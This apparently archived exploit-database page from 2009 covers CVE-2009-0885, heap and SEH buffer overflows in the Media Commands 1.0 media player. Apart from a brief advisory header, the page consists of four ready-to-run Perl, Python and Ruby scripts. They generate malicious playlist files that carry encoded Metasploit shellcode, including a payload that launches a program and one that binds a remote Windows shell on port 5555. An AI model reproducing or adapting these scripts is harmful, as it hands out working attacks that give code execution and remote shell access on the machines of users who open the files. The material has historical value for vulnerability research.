Home » Exploits » Media Commands Multiple Media File Multiple Heap Buffer Overflow Vulnerabilities
|
|
|
Feeds -
Exploits
|
|
Written by Hakxer
|
|
Friday, 20 March 2009 23:06 |
Media Commands Multiple Media File Multiple Heap Buffer Overflow Vulnerabilities
-\\Bugtraq ID:
33958
-\\Class:
Boundary Condition Error
-\\CVE:
CVE-2009-0885
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Mar 02 2009 12:00AM
-\\Updated:
Mar 20 2009 07:06PM
-\\Credit:
Hakxer
-\\Vulnerable:
Media Commands Media Commands 1.0
-\\Discussion
Media Commands is prone to multiple heap-based buffer-overflow vulnerabilities because it fails to
perform adequate boundary checks on user-supplied input.
Successfully exploiting these issues may allow remote attackers to execute arbitrary code in the
context of the application. Failed exploit attempts will cause denial-of-service conditions.
Media Commands 1.0 is vulnerable; other versions may also be affected.
-\\Exploit(s)/PoC(s):
To exploit these issues, an attacker must entice an unsuspecting user to open a malicious file using
the affected application.
The following proof of concept and exploits are available:
===============================================================
33958.pl
^^^^^^^^^
#!usr/bin/perl #
# Discovered & Coded by : Hakxer #
# Media Commands (M3U,M3l,TXT,LRC Files) Crash PoC #
# Greetz : Allah , ProViDoR , Egyptian x Hacker #
# Team : Egy coders Team #
# Download/http://www.mediacommands.com/download.html#
# Description : #
# Import Hakxer.[Ext] Into program ... #
# Program Get Crashed ;) #
######################################################
my $crash="http://"."A" x 5000;
my $CoDe=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x67".
"\x58\x30\x41\x31\x50\x41\x42\x6b\x42\x41\x77\x42\x32\x42\x41\x32".
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x79\x79\x6b\x4c\x70".
"\x6a\x78\x6b\x52\x6d\x4b\x58\x4b\x49\x39\x6f\x6b\x4f\x4b\x4f\x51".
"\x70\x4e\x6b\x72\x4c\x56\x44\x47\x54\x6c\x4b\x63\x75\x37\x4c\x4e".
"\x6b\x43\x4c\x66\x65\x70\x78\x35\x51\x78\x6f\x6e\x6b\x50\x4f\x65".
"\x48\x4e\x6b\x63\x6f\x65\x70\x34\x41\x68\x6b\x43\x79\x4e\x6b\x50".
"\x34\x6c\x4b\x54\x41\x38\x6e\x70\x31\x69\x50\x4c\x59\x4e\x4c\x4e".
"\x64\x39\x50\x33\x44\x54\x47\x6f\x31\x6b\x7a\x56\x6d\x54\x41\x6f".
"\x32\x38\x6b\x5a\x54\x55\x6b\x32\x74\x65\x74\x35\x78\x71\x65\x4d".
"\x35\x4e\x6b\x41\x4f\x65\x74\x64\x41\x58\x6b\x52\x46\x4e\x6b\x34".
"\x4c\x70\x4b\x6e\x6b\x61\x4f\x37\x6c\x63\x31\x6a\x4b\x63\x33\x64".
"\x6c\x6e\x6b\x6c\x49\x30\x6c\x36\x44\x47\x6c\x70\x61\x4f\x33\x70".
"\x31\x6b\x6b\x41\x74\x6e\x6b\x52\x63\x76\x50\x6c\x4b\x47\x30\x46".
"\x6c\x6c\x4b\x30\x70\x55\x4c\x6e\x4d\x4e\x6b\x51\x50\x77\x78\x73".
"\x6e\x42\x48\x4c\x4e\x62\x6e\x36\x6e\x6a\x4c\x30\x50\x6b\x4f\x48".
"\x56\x55\x36\x31\x43\x65\x36\x70\x68\x44\x73\x45\x62\x71\x78\x34".
"\x37\x44\x33\x50\x32\x43\x6f\x46\x34\x6b\x4f\x6a\x70\x42\x48\x58".
"\x4b\x6a\x4d\x69\x6c\x45\x6b\x66\x30\x69\x6f\x48\x56\x53\x6f\x4e".
"\x69\x58\x65\x31\x76\x4f\x71\x78\x6d\x46\x68\x57\x72\x56\x35\x51".
"\x7a\x43\x32\x6b\x4f\x38\x50\x61\x78\x6b\x69\x56\x69\x39\x65\x6c".
"\x6d\x50\x57\x4b\x4f\x7a\x76\x33\x63\x76\x33\x72\x73\x70\x53\x66".
"\x33\x61\x53\x70\x53\x71\x53\x53\x63\x4b\x4f\x5a\x70\x32\x46\x31".
"\x78\x37\x61\x41\x4c\x30\x66\x73\x63\x6b\x39\x4b\x51\x5a\x35\x45".
"\x38\x79\x34\x34\x5a\x30\x70\x4b\x77\x62\x77\x69\x6f\x6a\x76\x62".
"\x4a\x64\x50\x43\x61\x66\x35\x79\x6f\x5a\x70\x32\x48\x6c\x64\x4e".
"\x4d\x76\x4e\x6b\x59\x41\x47\x69\x6f\x4b\x66\x72\x73\x70\x55\x6b".
"\x4f\x6e\x30\x42\x48\x6b\x55\x73\x79\x4c\x46\x61\x59\x41\x47\x39".
"\x6f\x6b\x66\x36\x30\x50\x54\x43\x64\x56\x35\x4b\x4f\x4e\x30\x4c".
"\x53\x43\x58\x6b\x57\x73\x49\x79\x56\x42\x59\x72\x77\x4b\x4f\x4b".
"\x66\x76\x35\x79\x6f\x6e\x30\x73\x56\x72\x4a\x33\x54\x30\x66\x55".
"\x38\x73\x53\x42\x4d\x4f\x79\x58\x65\x53\x5a\x70\x50\x56\x39\x76".
"\x49\x7a\x6c\x4e\x69\x4b\x57\x30\x6a\x77\x34\x4d\x59\x58\x62\x66".
"\x51\x4f\x30\x68\x73\x4f\x5a\x4b\x4e\x70\x42\x46\x4d\x6b\x4e\x30".
"\x42\x34\x6c\x6a\x33\x4c\x4d\x63\x4a\x76\x58\x6c\x6b\x4c\x6b\x6c".
"\x6b\x30\x68\x73\x42\x49\x6e\x4f\x43\x46\x76\x69\x6f\x42\x55\x41".
"\x54\x39\x6f\x79\x46\x33\x6b\x56\x37\x31\x42\x43\x61\x42\x71\x41".
"\x41\x50\x6a\x76\x61\x52\x71\x52\x71\x32\x75\x71\x41\x69\x6f\x4a".
"\x70\x61\x78\x4c\x6d\x39\x49\x54\x45\x7a\x6e\x63\x63\x79\x6f\x4e".
"\x36\x70\x6a\x69\x6f\x4b\x4f\x37\x47\x6b\x4f\x6e\x30\x4e\x6b\x31".
"\x47\x6b\x4c\x6f\x73\x6a\x64\x41\x74\x4b\x4f\x6a\x76\x73\x62\x6b".
"\x4f\x68\x50\x43\x58\x4c\x30\x4f\x7a\x53\x34\x53\x6f\x43\x63\x79".
"\xda\xcb\xd9\x74\x24\xf4\x5e\x29\xc9\xb1\x51\xba\x0c\x2e\xe1\x3d".
"\x31\x56\x17\x83\xee\xfc\x03\x5a\x3d\x03\xc8\x9e\x2b\x28\x7e\xb6".
"\x55\x51\x7e\xb9\xc6\x25\xed\x61\x23\xb1\xab\x55\xa0\xb9\x36\xdd".
"\xb7\xae\xb2\x52\xa0\xbb\x9a\x4c\xd1\x50\x6d\x07\xe5\x2d\x6f\xf9".
"\x37\xf2\xe9\xa9\xbc\x32\x7d\xb6\x7d\x78\x73\xb9\xbf\x96\x78\x82".
"\x6b\x4d\xa9\x81\x76\x06\xf6\x4d\x78\xf2\x6f\x06\x76\x4f\xfb\x47".
"\x9b\x4e\x10\x74\x8f\xdb\x6f\x16\xeb\xc7\x0e\x25\xc2\x2c\xb4\x22".
"\x66\xe3\xbe\x74\x65\x88\xb1\x68\xd8\x05\x71\x98\x7c\x72\xfc\xd6".
"\x8e\x6e\x50\x19\x58\x08\x02\x83\x0d\xe6\x96\x23\xb9\x7b\xe5\xec".
"\x11\x83\xd9\x7a\x51\x96\x26\x41\x35\x96\x01\xea\x3c\x8d\xc8\x95".
"\xd2\x46\x17\xc0\x46\x55\xe8\x3a\xfe\x80\x1f\x4f\x52\x65\xdf\x79".
"\xfe\xd9\x4c\xd6\x52\x9d\x21\x9b\x07\xde\x16\x7d\xc0\x31\xcb\xe7".
"\x43\xbb\x12\x72\x0b\x1f\xce\x0c\x0b\x08\x10\x3a\xf9\xa7\xbf\x97".
"\x01\x17\x57\xb3\x53\xb6\x41\xec\x54\x11\xc2\x47\x54\x4e\x8d\x82".
"\xe3\xe9\x07\x1b\x0b\x23\xc7\xf7\xa7\x99\x17\x27\xd4\x4a\x0f\xbe".
"\x1d\xf3\x98\xbf\x74\x51\xd8\xef\x1f\x30\x42\x69\x88\xa7\xe7\xfc".
"\xad\x42\xa8\xa7\x04\x5f\xc1\xb0\x3d\x1b\x5b\xdc\xf3\x63\xa8\x8a".
"\x0a\x21\x62\x34\xb0\x8a\xef\x45\x4f\xeb\xa4\xfe\x1b\x63\xc9\xfe".
"\xef\x62\xd2\x8b\x4b\x74\xfa\x28\x03\xd8\x52\x9f\xfa\xb6\x55\x4e".
"\xac\x13\x07\x8f\x9e\xf4\x0a\xb6\x1a\xcb\x06\xb7\xf3\xb9\x57\xb8".
"\xcb\xc2\x78\xcd\x63\xc1\xfa\x15\xef\xc6\x2b\xc7\x0f\xe8\xbc\x17".
"\x65\x0d\x62\x84\x85\xd8\x63\xfa";
# open(MYFILE,'>>hakxer.m3u');
# open(MYFILE,'>>hakxer.txt');
# open(MYFILE,'>>hakxer.m3l');
open(MYFILE,'>>hakxer.lrc');
print MYFILE $c0de;
print MYFILE $crash;
close(MYFILE);
===============================================================
33958.py
^^^^^^^^^
#usage: exploit.py
print "**************************************************************************"
print " Media Commands (m3u File) local Seh Overwrite Exploit\n"
print " Founder: Hakxer"
print " Exploited: His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)\n"
print "**************************************************************************"
buff = "\x41" * 4103
next_seh = "\xEB\x06\x90\x90"
seh = "\x35\x2F\xC6\x72" #pop pop ret msacm32.drv
nop = "\x90" * 19
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x50\x42\x50\x42\x50\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x47"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x58"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x38"
"\x4f\x45\x46\x32\x41\x30\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x54"
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58"
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x37"
"\x4e\x50\x4b\x38\x42\x54\x4e\x50\x4b\x48\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x38\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x33\x4f\x35\x41\x43"
"\x48\x4f\x42\x56\x48\x55\x49\x38\x4a\x4f\x43\x38\x42\x4c\x4b\x47"
"\x42\x35\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x55\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x58\x50\x30\x47\x55\x4f\x4f\x47\x4e\x50\x36\x4f\x46"
"\x46\x47\x45\x56\x42\x57\x41\x56\x46\x56\x42\x30\x5a"
)
exploit = buff + next_seh + seh + nop + shellcode
try:
out_file = open("exploit.m3u",'w')
out_file.write(exploit)
out_file.close()
print "Exploit File Created!"
except:
print "Error"
===============================================================
33958.rb
^^^^^^^^^
#!/usr/bin/env ruby
# Media Commands .m3l Local Buffer Overflow Exploit
# By Mountassif Moad
# Down : http://www.mediacommands.com/download/&product=MCV100A.exe
# C:\nc>nc -v 127.0.0.1 5555
# DNS fwd/rev mismatch: localhost != stack-f286641
# localhost [127.0.0.1] 5555 (?) open
# Microsoft Windows XP [version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# C:\Program Files\Media Commands\Animation>
# exit Booooooooooom
time3 = Time.new
puts "Exploit Started in Current Time :" + time3.inspect
puts "Enter Name For your File Like : Stack"
moad = gets.chomp.capitalize
puts "Name Of File : " + moad +'.m3l'
time1 = Time.new
$VERBOSE=nil
Header =
"\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74"+
"\x5D\x0D\x4E\x75\x6D\x62\x65\x72"+
"\x4F\x66\x45\x6E\x74\x72\x69\x65"+
"\x73\x3D\x31\x0D\x46\x69\x6C\x65\x31\x3D"
# win32_bind - EXITFUNC=seh LPORT=5555 Size=709 Encoder=PexAlphaNum http://metasploit.com
Shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"+
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x58"+
"\x4e\x46\x46\x42\x46\x52\x4b\x58\x45\x44\x4e\x53\x4b\x48\x4e\x47"+
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x41\x4b\x48"+
"\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x33\x4b\x48"+
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x52\x45\x57\x45\x4e\x4b\x48"+
"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54"+
"\x4b\x38\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x30\x4e\x32\x4b\x58"+
"\x49\x48\x4e\x46\x46\x32\x4e\x41\x41\x56\x43\x4c\x41\x43\x4b\x4d"+
"\x46\x46\x4b\x58\x43\x34\x42\x43\x4b\x48\x42\x34\x4e\x50\x4b\x58"+
"\x42\x37\x4e\x41\x4d\x4a\x4b\x58\x42\x34\x4a\x50\x50\x35\x4a\x36"+
"\x50\x38\x50\x34\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x46"+
"\x43\x35\x48\x56\x4a\x46\x43\x53\x44\x53\x4a\x46\x47\x47\x43\x37"+
"\x44\x53\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"+
"\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"+
"\x48\x36\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x30"+
"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x45"+
"\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x35\x43\x45\x43\x55\x43\x34"+
"\x43\x55\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x45\x41"+
"\x43\x4b\x48\x36\x43\x45\x49\x48\x41\x4e\x45\x39\x4a\x56\x46\x4a"+
"\x4c\x31\x42\x57\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x41"+
"\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52"+
"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d"+
"\x4a\x46\x45\x4e\x49\x44\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d"+
"\x42\x55\x46\x55\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x56"+
"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x35"+
"\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x46\x48\x36\x4a\x46\x43\x46"+
"\x4d\x46\x49\x48\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x32\x4e\x4c"+
"\x49\x48\x47\x4e\x4c\x36\x46\x34\x49\x48\x44\x4e\x41\x43\x42\x4c"+
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x44\x4e\x32"+
"\x43\x39\x4d\x58\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"+
"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x37\x46\x44\x4f\x4f"+
"\x48\x4d\x4b\x55\x47\x55\x44\x45\x41\x45\x41\x45\x41\x45\x4c\x56"+
"\x41\x30\x41\x45\x41\x55\x45\x35\x41\x55\x4f\x4f\x42\x4d\x4a\x56"+
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"+
"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x58\x47\x45\x4e\x4f"+
"\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"+
"\x4a\x56\x42\x4f\x4c\x38\x46\x30\x4f\x55\x43\x55\x4f\x4f\x48\x4d"+
"\x4f\x4f\x42\x4d\x5a"
Bof = "\x41" * 4097
Nseh = "\xEB\x06\x90\x90"
seh = "\x35\x2F\xC6\x72"
Nop = "\x90" * 15
crash = Header + Bof + Nseh + seh + Nop + Shellcode
File.open( moad+".m3l", "w" ) do |the_file|
the_file.puts(crash)
puts "Exploit finished in Current Time :" + time1.inspect
puts "Now Open " + moad +".m3l :d"
end
===============================================================
33958-2.py
^^^^^^^^^^^
#usage: exploit.py
print "**************************************************************************"
print " Media Commands (m3u File) Universal Seh Overwrite Exploit\n"
print " Founder: Hakxer"
print " Exploited by : His0k4"
print " Another Exploiter : Stack"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)\n"
print "**************************************************************************"
buff = "\x41" * 4103
next_seh = "\xEB\x06\x90\x90"
seh = "\x9F\x20\x01\x10" #Universal pop pop ret :p
nop = "\x90" * 19
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x30\x42\x30\x42\x30\x4b\x48\x45\x34\x4e\x53\x4b\x48\x4e\x47"
"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x33\x4b\x38"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x55\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x58"
"\x4f\x55\x46\x32\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54"
"\x4b\x38\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x48"
"\x41\x30\x4b\x4e\x49\x38\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x48\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x48\x42\x34\x4e\x30\x4b\x38\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b"
"\x42\x30\x42\x30\x42\x30\x4b\x38\x4a\x46\x4e\x43\x4f\x45\x41\x53"
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
"\x42\x45\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x35\x4a\x56\x4a\x59"
"\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x36"
"\x4e\x36\x43\x36\x42\x50\x5a"
)
exploit = buff + next_seh + seh + nop + shellcode
try:
out_file = open("exploit.m3u",'w')
out_file.write(exploit)
out_file.close()
print "Exploit File Created!"
except:
print "Error"
-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are
aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s)
--Media Commands Homepage
http://www.mediacommands.com (Media Commands)
|
|
|
|
